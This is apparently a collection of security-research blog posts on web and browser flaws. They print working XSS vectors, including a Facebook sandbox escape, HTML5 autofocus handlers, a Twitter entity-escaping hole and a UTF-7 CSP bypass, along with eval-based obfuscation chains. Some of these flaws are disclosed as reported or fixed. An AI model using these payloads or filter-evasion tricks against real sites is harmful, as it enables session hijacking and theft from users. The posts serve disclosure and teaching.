My RegExp is still leaking

The great thing about standards is that sometimes they are blindly followed and it’s not until maybe years down the line that you realise they got it wrong. Personally I think standards should be organically developed in code, then defined in a standard once the various flaws have been ironed out. Every standard should include code samples for every single thing it defines; that way it is quite easy to spot the intention and how to abuse it.

You could argue this is already done but I disagree: we should have standard prototypes with testing code for each, so we can use the code samples alongside the specification. The W3C decided to release a security list, which is a fantastic idea, but why did it take so long?

Anyway, things are changing and that is cool, but on to my RegExp I think. Why the standards rant? Well, the RegExp object was defined in the specification as a global object that exposes, among other things, the last result of a regular expression literal. I have no idea why; the same result could be achieved using a reference to the regular expression like so:-

a=/a/;
a.test('a');
a.lastMatch;// This doesn't work
//RegExp.lastMatch this does work but shouldn't

So as you can see we can access the result of an expression even without a reference to the variable. This is bad when we start mixing untrusted JavaScript in the future, as we don’t want to expose other matches to different untrusted code. What’s new, I hear you say? I posted about this before… well, don’t you know that some browsers had the crazy idea of supporting regular expressions as functions? Yeah, true: for some crazy reason, rather than a regular expression being just a RegExp object, it can be called as a function! I would like, for example, the following code to return my user agent string please:-

javascript:alert(/.+/());

I’m not a crazy man, honest :) Let’s visit mmm apples, use Safari and type the string above in the URL bar. What do we get? The user agent! If you look at the source code of the page, you’ll find that they use an external JavaScript file which runs a regexp match on the user agent. Because this is the lastMatch, and we didn’t provide a string to the regexp in the function arguments, it decides to return the lastMatch instead of the input we provide. Nice.

This works on Google Chrome too. You might get different results with Firefox if you have NoScript installed, because it runs RegExp matches on parts of the page.
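To make the leak concrete, here is a minimal sketch of two unrelated functions sharing one JavaScript global. The user agent string and both function names are made up for illustration, and it assumes an engine that still exposes the legacy RegExp.lastMatch static property (V8 does):

```javascript
// Hypothetical "trusted" script: sniffs the browser with a regexp.
// The user agent value is invented for this example.
function trustedSniff(userAgent) {
  return /Safari\/[\d.]+/.test(userAgent);
}

// Hypothetical "untrusted" script: it never sees the regexp or the string,
// yet the global RegExp object still hands over the last match.
function untrustedPeek() {
  return RegExp.lastMatch;
}

trustedSniff('Mozilla/5.0 (made up) Safari/531.9');
const leaked = untrustedPeek();
console.log(leaked);
```

The second function has no reference to the first one’s regexp or input, which is exactly the problem once different parties share the same JavaScript space.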

The safety net

I was thinking lately about how to prevent a user being exploited by whatever method. One thing most attacks have in common is that a user generally needs to initiate the attack by clicking on an email or web site link from a social network. There’s an obvious pattern here. Granted, some attacks are conducted on the application itself, an XSS worm or network worm for example, but these aren’t as common as the majority of attacks that require some form of initiation.

My solution? The safety net! When your average joe clicks on a link from Twitter, they usually want to watch a funny video or something. Using this to its advantage, the safety net detects when this happens; it is aware of the context, an email for example, or that this particular social network is quite popular. When a user clicks a link from that context, the browser doesn’t need to send any cookie related information from anywhere whilst in the “Safety net”.

It acts as a sandbox for the user, protecting them from bad stuff. The user should be aware that they’re in it and should not be able to browse like normal unless they open a new window by the traditional means. It could also work for phishing, prompting the user not to enter any confidential information or maybe disabling form input completely except for whitelisted sources. Corporations could configure their safety net to be more restrictive: a policy for disabling JavaScript, for example, or maybe only allowing Flash to play video and not execute ActionScript.

If anyone thinks this idea isn’t too crazy and decides to implement it, here are a couple of suggestions (I’ll refer to the Safety net as SN):-

1. Whilst in the SN any executed javascript or other code should always remain in the SN.
2. New windows or frames should not be allowed in the SN.
3. The browser should look different in the SN to inform the user that they are in a more restrictive browsing experience.
4. Closing the SN should be the only way out of it and the user must be clear that is what is happening.
5. Form input could be restricted in the SN.
6. Session data or cookies should not be transferred from/to the SN.
7. ANY form of download should not be permitted in the SN.
8. Third party plugins should only be allowed in restricted mode. For example, a PDF file should have a restricted mode in which many features, like JavaScript, are disabled. Only if this mode is enabled would the PDF be allowed to execute.
9. Full screen mode should be prevented.
10. Being in the SN is equivalent to opening the browser for the first time.
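If it helps anyone picture it, the rules above could be sketched as a tiny policy check. This is only an illustration: the action names, the SN_BLOCKED set and the snDecision function are all made up here, and no browser exposes anything like them.

```javascript
// Hypothetical action names; nothing here is a real browser API.
// Rules 2, 6, 7 and 9: these are simply refused inside the SN.
const SN_BLOCKED = new Set([
  'open-window', 'open-frame', 'send-cookies', 'download', 'fullscreen',
]);

// Rules 5 and 8: allowed, but only in a cut-down form.
const SN_RESTRICTED = new Set(['form-input', 'run-plugin']);

function snDecision(action, inSafetyNet) {
  if (!inSafetyNet) return 'allow';          // normal browsing is untouched
  if (SN_BLOCKED.has(action)) return 'block';
  if (SN_RESTRICTED.has(action)) return 'restricted';
  return 'allow';                            // e.g. rendering the page itself
}

console.log(snDecision('send-cookies', true));  // decision inside the SN
console.log(snDecision('send-cookies', false)); // same action outside it
```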

Additionally I suggest a meta tag to identify social networks:-

<meta name="identify" content="Social Network" />

Facebook sandbox escape

My friend Mario (he who never blogs) found XSS in Facebook a couple of times. This tempted me to look at their sandbox; I didn’t register for an account but just tried breaking their FBML console.

They have their own FBML (Facebook markup language), which is just basic HTML/CSS, and a separate JavaScript sandbox which restricts what you can execute and access by scoping everything to the app ID. I didn’t need to break their JavaScript sandbox, as breaking the FBML would allow me to execute any code, access the document source, etc.

I thought the best way to beat the sandbox would be through CSS expressions, as they use the IE7 compat header. I tested their console a couple of times and within 10 minutes found that they fail to parse CSS comments correctly. Next came incorrectly HTML-encoded quotes, so I had the right tools to break out of there, but I still needed to execute JavaScript. They allowed stuff like xpression(), and I tried double encoding expression in various ways, but they seemed to catch it OK. Then I checked their charset, which I presumed was UTF-8, and it is :) I used my old trick of placing a UTF-8 BOM character before the “e” in expression and boom, I had a bypass. The first attempt didn’t work because the quote was in the wrong place, but I knew that with a little modification it would work, and the final vector is below:-

<div style=background-image:url('http://&quot;);xss/**/&#x3a;&#65279expression(alert(1));+&quot;')!important;></div>

Note the &#65279 needed to be the actual character in order to break the sandbox, but the vector should execute as is anyway and it was easier to see this way. The !important part isn’t required, but I just thought I’d assign priority :) The vector has now been fixed by Facebook.
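I don’t know what Facebook’s filter actually looked like, so the following is only a guess at the general shape of the mistake: a hypothetical blacklist that compares whole tokens, and therefore misses “expression” when an invisible U+FEFF is glued to the front of it. Both function names are invented for this sketch.

```javascript
// Hypothetical token blacklist; NOT Facebook's real filter.
// Note the explicit delimiter list: JavaScript's \s would itself match U+FEFF.
function naiveIsSafe(cssValue) {
  const tokens = cssValue.toLowerCase().split(/[ \t\r\n:;()'"\/*]+/);
  return !tokens.includes('expression');
}

// Same check, but invisible BOM characters are stripped first.
function normalizedIsSafe(cssValue) {
  return naiveIsSafe(cssValue.replace(/\uFEFF/g, ''));
}

const plain = 'xss:expression(alert(1))';
const withBom = 'xss:\uFEFFexpression(alert(1))';

console.log(naiveIsSafe(plain));        // the plain keyword is caught
console.log(naiveIsSafe(withBom));      // the BOM-prefixed one slips through
console.log(normalizedIsSafe(withBom)); // caught again after normalising
```

The general lesson is to normalise input to what the browser will actually interpret before applying any blacklist.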

Facebook vector

HTML5 new XSS vectors

So I posted some new XSS vectors on Twitter and I thought I’d share them on the blog in case anyone missed them. Safari, Chrome and Opera all support these now :) We have a brand new way of auto-executing XSS.

Normally when you find an XSS hole within an input element that has filtered < and >, you can’t exploit it automatically without using CSS expressions. The injection looks something like:-

<input type="text" USER_INPUT>

Here you can do style=xss:expression(alert(1)) or moz-binding etc., but it only works on a limited number of browsers. HTML5, however, lets us auto-execute just like expressions do, but without CSS styles. For example:-

<input type="text" AUTOFOCUS onfocus=alert(1)>

We use the “autofocus” feature to focus our element and then the onfocus event to execute our XSS. This works with a plethora (I like that word) of tags. It seems you can use this method on any form-based element:-

<input autofocus onfocus=alert(1)>
<select autofocus onfocus=alert(1)>
<textarea autofocus onfocus=alert(1)>
<keygen autofocus onfocus=alert(1)>
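As a small sketch of why filtering < and > alone doesn’t help here, consider a made-up server-side filter (stripAngleBrackets is a hypothetical name) whose output is dropped into the tag from the example above:

```javascript
// Hypothetical filter that only removes angle brackets.
function stripAngleBrackets(input) {
  return input.replace(/[<>]/g, '');
}

// The payload needs no angle brackets at all, so it passes through untouched.
const payload = 'autofocus onfocus=alert(1)';
const html = '<input type="text" ' + stripAngleBrackets(payload) + '>';

console.log(html);
```

The injected attributes survive intact, and a browser that supports autofocus fires the handler without any user interaction.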

Ping pong obfuscation

This is a fun post about a feature I found in IE that allows you to do some crazy obfuscation. I’ll start off with some simple examples:-

<img src=1 language=vbs onerror=msgbox+1>
<img src=1 language=vbscript onerror=msgbox+1>
<img src=1 onerror=vbs:msgbox+1>

So here we’re not obfuscating, but I’m showing how IE accepts the language attribute and a labelled vbs statement to switch the event handler to VBScript instead of JavaScript. OK, so let’s play a little ping pong:-

execScript("MsgBox 1","vbscript"); //executes vbs from js
execScript('execScript "alert(1)","javascript"',"vbscript");

Look how we can call VBScript from JavaScript by using execScript, and then look how we can go from JavaScript to VBScript and then back to JavaScript again! So now we’re playing some ping pong, but how can we make our little game hidden?

<a href=# language="JScript.Encode" onclick="#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@">test</a>

Wait what? Yeah IE supports jscript.encode within the language attribute. Remember jscript.encode? ah the old ones are the best :) That’s it right? Well….

<iframe onload=VBScript.Encode:#@~^CAAAAA==\ko$K6,FoQIAAA==^#~@>

Yeah, you can use VBScript.Encode and JScript.Encode as labels within an event! You might be going WTF right now and I can understand it because I did exactly the same, but it would be silly to stop now without finishing our game of ping pong. How many rallies shall I do? I think 3 should be enough….

<body onload="&#x6a;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x2e;&#x65;&#x6e;&#x63;&#x6f;&#x64;&#x65;&#x3a;&#x23;&#x40;&#x7e;&#x5e;&#x54;&#x41;&#x41;&#x41;&#x41;&#x41;&#x3d;&#x3d;&#x6e;&#x58;&#x2b;&#x5e;&#x55;&#x6d;&#x4d;&#x6b;&#x77;&#x44;&#x60;&#x72;&#x3a;&#x40;&#x24;&#x3f;&#x37;&#x33;&#x68;&#x7a;&#x62;&#x29;&#x29;&#x7b;&#x27;&#x5a;&#x25;&#x51;&#x52;&#x47;&#x3d;&#x32;&#x9;&#x56;&#x37;&#x57;&#x42;&#x20;&#x71;&#x64;&#x47;&#x5c;&#x3a;&#x32;&#x6a;&#x62;&#x65;&#x62;&#x7a;&#x29;&#x27;&#x7b;&#x37;&#x3a;&#x3d;&#x40;&#x24;&#x4a;&#x7e;&#x45;&#x25;&#x6b;&#x6d;&#x2e;&#x6b;&#x61;&#x4f;&#x63;&#x2b;&#x55;&#x31;&#x57;&#x39;&#x2b;&#x4a;&#x2a;&#x43;&#x52;&#x63;&#x41;&#x41;&#x41;&#x3d;&#x3d;&#x5e;&#x23;&#x7e;&#x40;">

Ok so I go to:-
jscript->jscript.encode->jscript.encode->jscript.encode->hex entities
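The last step of the chain, the hex entities, is easy to reproduce. Here is a minimal sketch (toHexEntities is just a name I picked) that turns each character into an unpadded &#x…; entity, which matches the style used in the body tag above:

```javascript
// Encode every character as a hexadecimal HTML entity, without zero padding,
// so a tab becomes &#x9; just like in the vector above.
function toHexEntities(text) {
  return Array.from(text, (ch) => '&#x' + ch.codePointAt(0).toString(16) + ';').join('');
}

// The label at the start of the onload attribute.
const label = toHexEntities('jscript.encode:');
console.log(label);
```

The encoded payload itself would still have to come from the real script encoder; this only covers the entity layer.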

Twitter misidentifying context

This is an important post for me, not because it’s ground breaking but because people don’t seem to get this when using data in a certain context. If you are a dev please read this and read it until you understand it, because if you misidentify context you fail and you fail pretty badly.

I reported this to Twitter about two months ago. They responded and fixed four XSS holes, but two remain and they didn’t contact me to test the fix.

When you are including user input inside a javascript event within a string what do you have to escape? If you answered: ‘”<>\
You are wrong. Twitter is wrong.

Take the following example:-

<a href=# onclick="x= 'USERINPUT' ">test</a>

So you can place your input within the single quotes and there is a place on twitter that does this:-
twitterTheseResults(’ \&quot;\’xss’,'/search?q=&a…

Here they are escaping &quot; with \&quot; and ‘ with \’. But that isn’t enough! Why? Because it’s a javascript onclick event! Inside an event you have to escape entities! All of them!

Consider the following vector:-
&apos;,alert(1),&apos;

No single quotes but &apos; still acts as one. Please look at this test and make sure you understand how it works:-
http://tinyurl.com/xssyoda

Don’t forget other entities work too &#39; &#x27; &#39 &#x27 so make sure you escape all characters within a js event like so:-

<a href="#" onclick="x='USERINPUT\x27\x22\x3c\x3e'">test</a>

and Twitter PLEASE fix this and related holes c’mon it’s been two months, it’s not rocket science to fix:-
Twitter poc (don’t tweet these results)

&apos; works on non-IE browsers but the other entities mentioned work fine on IE too.
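Here is a minimal sketch of the escaping I’m suggesting for a value that lands inside a JavaScript string within an event attribute. The function name is mine; the idea is simply that anything that isn’t a plain letter or digit becomes a \xNN or \uNNNN escape, so no quote, ampersand or semicolon is left for the HTML parser to turn into an entity:

```javascript
// Escape everything except A-Z, a-z and 0-9 as a JavaScript string escape.
// Without the "u" flag the regexp works per UTF-16 code unit, so characters
// outside the BMP come out as two \uNNNN escapes (a surrogate pair).
function escapeForJsString(input) {
  return String(input).replace(/[^A-Za-z0-9]/g, (ch) => {
    const code = ch.charCodeAt(0);
    return code < 0x100
      ? '\\x' + code.toString(16).padStart(2, '0')
      : '\\u' + code.toString(16).padStart(4, '0');
  });
}

const escaped = escapeForJsString("&apos;,alert(1),&apos;");
console.log(escaped);
```

The output contains only letters, digits and backslashes, so it is inert in the attribute but still decodes to the original text inside the JavaScript string.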

Bypassing CSP for fun, no profit

I had fun at Confidence 2.0 CON, I’m gonna blog about the stuff I was holding back now :)

So I figured out how to bypass CSP with UTF-7 and JSON. Basically any site with a JSON feed that can be manipulated by an attacker (reflective or persistent) can be injected with script, even when the JSON feed is correctly escaped.

UTF-7 can be fully encoded, meaning that you can conceal string delimiters and other characters. ‘ABC’ becomes +ACcAQQBCAEMAJw-. So if we look at a fictional JSON feed such as:-
[{'friend':'something','email':'something'}]

If we can influence the “something” parts then we inject the feed with our data to bypass CSP:-
[{'friend':'luke','email':'+ACcAfQBdADsAYQBsAGUAcgB0ACgAJwBNAGEAeQAgAHQAaABlACAAZgBvAHIAYwBlACAAYgBlACAAdwBpAHQAaAAgAHkAbwB1ACcAKQA7AFsAewAnAGoAbwBiACcAOgAnAGQAbwBuAGU-'}]

This is what the code looks like when decoded:-
[{'friend':'luke','email':''}];alert('May the force be with you');[{'job':'done'}]
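If you want to check the encoding yourself, here is a rough sketch of the “fully encoded” UTF-7 form: the text as UTF-16BE bytes, base64 without padding, wrapped in + and -. The function names are mine and it leans on Node’s Buffer, so treat it as an assumption-laden helper rather than a complete UTF-7 codec:

```javascript
// Encode every character, even plain ASCII, as one UTF-7 shifted block.
function utf7Encode(text) {
  const bytes = Buffer.alloc(text.length * 2);
  for (let i = 0; i < text.length; i++) {
    bytes.writeUInt16BE(text.charCodeAt(i), i * 2); // UTF-16 big endian
  }
  return '+' + bytes.toString('base64').replace(/=+$/, '') + '-';
}

// Decode a single +...- block back into text.
function utf7Decode(block) {
  const bytes = Buffer.from(block.replace(/^\+/, '').replace(/-$/, ''), 'base64');
  let out = '';
  for (let i = 0; i + 1 < bytes.length; i += 2) {
    out += String.fromCharCode(bytes.readUInt16BE(i));
  }
  return out;
}

console.log(utf7Encode("'ABC'"));

// The injected email value from the feed above.
const injected = utf7Decode('+ACcAfQBdADsAYQBsAGUAcgB0ACgAJwBNAGEAeQAgAHQAaABlACAAZgBvAHIAYwBlACAAYgBlACAAdwBpAHQAaAAgAHkAbwB1ACcAKQA7AFsAewAnAGoAbwBiACcAOgAnAGQAbwBuAGU-');
console.log(injected);
```

Notice the encoded value contains nothing but letters, digits and a + and -, which is why a correctly escaped JSON feed lets it straight through.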

We then inject the data by referencing it using a script tag and a charset:-

"><script src="http://some.website/test.json" charset="utf-7"></script>

This successfully executes under CSP, bypassing its restrictions, because the code comes from the domain itself and doesn’t use in-line or attribute based XSS.

As always a demo is available here:-
CSP bypass

My RegExp is leaking

I discovered a long time ago that the JavaScript specification actually encourages the global RegExp object to retain the properties from the last execution of the regular expression parser. This is quite funny and stupid, because as we move forward and sites start to share the same JavaScript space we will leak information that we don’t want to leak.

Don’t get me wrong, this isn’t a huge issue; it’s just one of those little spec holes which we can exploit for obfuscation or information leakage. NoScript or Firefox, I’m not sure which, seems to leak the last RegExp execution when called from an event. An example of this can be viewed here:-

Regexp leak

So when you click the link, the URL is actually built from NoScript’s scan of the URL using the following code:-

alert(RegExp['$`']+RegExp['$&']+RegExp['$\''])

This could be used for hiding an XSS payload or something; like I said, not really that serious… OK, on to obfuscation. We can use leftContext etc. as a variable to eval, executing code based on the RegExp matches like so:-

/\u0024/.test('\x61\x6c\x65\x72\x74\x28\x31\x29\x24');
eval(RegExp['$`'])

So the pattern finds \$ within the text alert(1)$ and returns the leftContext (RegExp['$`']) which is alert(1) and executes the code.
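Here is the same thing as a harmless sketch that stores the three legacy properties instead of passing them to eval. It assumes an engine that still supports the static RegExp['$`'], RegExp['$&'] and RegExp["$'"] properties (V8 does); the variable names are mine:

```javascript
// Match a literal "$" (written as \u0024) at the end of the text.
/\u0024/.test('alert(1)$');

// Read the legacy static properties straight away, before any other
// regexp runs and overwrites them.
const leftContext = RegExp['$`'];  // text before the match
const lastMatch = RegExp['$&'];    // the match itself
const rightContext = RegExp["$'"]; // text after the match

console.log(leftContext, lastMatch, rightContext);
```

Gluing the three back together gives the whole input string, which is how the alert in the NoScript example above rebuilds the URL.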

And finally I’ll leave you with some bonus obfuscation:-

eval('a'.replace(/(.+)/,'$1l').replace(/(.+)/,'$1e').replace(/(.+)/,'$1r').replace(/(.+)/,'$1t').replace(/(.+)/,'$1(').replace(/(.+)/,'$11').replace(/(.+)/,'$1)'))
eval('342342ale'.replace(/\d+/,'$`')+'rt23879'.replace(/\d+/,'$\'')+'abcdefggi(1)'.replace(/.+(\([1]\))/,'$+'))

PHP self return of the slash

Not posted for a while because I couldn’t think of anything interesting to say but I thought about something I found ages ago in PHP4 and it’s been long enough now. This is also quite funny because my server is vulnerable to this (that’s what I get for crappy hosting).

So what happens if you escape PHP_SELF with htmlentities($_SERVER['PHP_SELF'], ENT_QUOTES)? Safe from XSS? I hope so. Safe from everything? Well, not really, or at least it didn’t use to be. You see, PHP does some crazy things with the URL and it’s possible to change a form target to an external URL without using any unsafe characters. Take the following example:-

Login form

This form simulates some web application login and uses PHP_SELF to output the URL because for some reason the developer doesn’t want to type “login.php” or use __FILE__. The URL is escaped from XSS but we can change the form target by simply supplying slashes :) e.g.

Sending Google your password

So the user enters their username and password combination and thinks that they are logging on to the target application; in reality they are sending the details to an evil site.

I checked PHP5 and it seemed ok but this will serve as a reminder that the slash can get you.
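The original example links are gone, so here is only a rough sketch of the idea in JavaScript rather than PHP. It assumes PHP_SELF ends up starting with two slashes; the host names, the path and the escapeHtml stand-in for htmlentities are all invented. It shows that HTML escaping leaves slashes alone and that a browser resolves such an action against the page as a different host:

```javascript
// Crude stand-in for htmlentities(..., ENT_QUOTES): escapes & < > " '
// as numeric entities and nothing else.
function escapeHtml(text) {
  return text.replace(/[&<>"']/g, (ch) => '&#' + ch.charCodeAt(0) + ';');
}

const pageUrl = 'http://target.example/app/login.php'; // made-up victim page
const phpSelf = '//evil.example/collect';              // assumed PHP_SELF value

// Nothing to escape: the value contains no "unsafe" characters.
const action = escapeHtml(phpSelf);

// Resolve the form action the way a browser would.
const resolved = new URL(action, pageUrl);
console.log(action, resolved.href);
```

A value starting with // is a scheme-relative URL, so the form posts to whichever host follows the slashes.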

Javascript compression with unicode characters

For some random reason I was making a base999 number compression function, I think it was because someone posted on sla.ckers about base 62. I wanted to see how far I could compress the numbers using a higher range of characters, then it hit me. Why not use it for js compression :)

You see, if you convert the characters to their character code numbers, then take a section of the resulting digits and convert it to a unicode character, you can drastically reduce the number of characters, provided of course your code contains enough characters, as a decompression function is required.

I’ve added the jspack tag to Hackvertor to demo the compression. Here is a sample of code:-

eval("◮ᾥѵ٨ፍ".replace(/[^\s]/g,function(c){return c.charCodeAt()}).replace(/[3][2-9]|[4-9][0-9]|[1][0-1][0-9]|[1][2][0-6]/g,function(d){return String.fromCharCode(d)}))

The unpacking function simply gets the character codes, then the very specific regexp finds a range of characters from !-~ based on the character code number. This is needed because I only have one long number and the individual codes are not separated. I leave spaces intact because they don’t fall within the ranges, and also because code can break syntactically if spaces go missing where there is no semi-colon. It’s possible to reduce it further by including these characters.
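For anyone who wants to play along, here is a sketch of a matching packer. It is my reconstruction for illustration, not the Hackvertor code: pack and chunkDigits are invented names, it only handles printable ASCII plus spaces, and it backtracks so that no chunk starts with a zero or turns into a whitespace character (the unpacker would otherwise lose digits).

```javascript
// The unpacker from the sample above, wrapped in a function instead of eval().
function unpack(packed) {
  return packed
    .replace(/[^\s]/g, (c) => c.charCodeAt(0))
    .replace(/3[2-9]|[4-9][0-9]|1[0-1][0-9]|12[0-6]/g, (d) => String.fromCharCode(d));
}

// Split a digit string into characters holding up to 4 digits each.
function chunkDigits(digits, start = 0) {
  if (start === digits.length) return [];
  for (let n = 4; n >= 1; n--) {
    const end = start + n;
    if (end > digits.length) continue;
    if (digits[end] === '0') continue; // next chunk would lose its leading zero
    const ch = String.fromCharCode(Number(digits.slice(start, end)));
    if (/\s/.test(ch)) continue;       // unpack() leaves whitespace untouched
    const rest = chunkDigits(digits, end);
    if (rest !== null) return [ch, ...rest];
  }
  return null; // no valid split from here, so the caller backtracks
}

function pack(code) {
  return code.split(' ').map((word) => {
    let digits = '';
    for (const ch of word) {
      const n = ch.charCodeAt(0);
      if (n < 33 || n > 126) throw new RangeError('only printable ASCII and spaces are supported');
      digits += n;
    }
    const chunks = chunkDigits(digits);
    if (chunks === null) throw new Error('could not pack: ' + word);
    return chunks.join('');
  }).join(' ');
}

console.log(pack('alert(1)'));
console.log(unpack(pack('var x=1')));
```

Packing alert(1) this way gives back the same five characters used in the sample above. Packed output can contain quotes, backslashes or control characters, so it may need escaping before being pasted into a string literal.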

So if you want to have some fun, try reducing the amount of characters compressed and see if you can create a smaller decompression function. Below is an example of the jspack tag in action:-
JS pack

Update…

OK, as Andrea pointed out, this isn’t actual compression; however, many systems including Twitter count each unicode character as only 1 byte, which lets you send a longer message. So you can compress a 280 character message into 140. Sirdarckcat managed to get it down to the 50% ratio, and you can send encoded Twitter messages with Hackvertor. Like this:-

Encoded twitter message